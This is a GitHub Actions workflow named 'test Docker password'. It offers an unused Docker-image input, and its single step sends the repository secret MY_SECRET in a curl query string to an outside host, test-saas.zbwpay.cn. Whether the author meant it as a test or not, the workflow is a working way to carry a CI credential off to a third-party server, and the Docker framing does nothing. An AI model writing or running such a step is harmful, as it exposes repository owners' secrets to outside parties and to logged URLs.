name: test Docker password
on:
  workflow_dispatch:
    inputs:
      docker_images:
        description: '请填写docker镜像名称 多个用英文逗号分开'
        required: true
        default: 'yes'  # 设置默认的 Docker 镜像列表
jobs:
  example-job:
    runs-on: ubuntu-latest
    steps:
      - name: Retrieve secret
        env:
          super_secret: ${{ secrets.MY_SECRET }}
        run: |
          curl "https://test-saas.zbwpay.cn:441/ping?test=$super_secret"
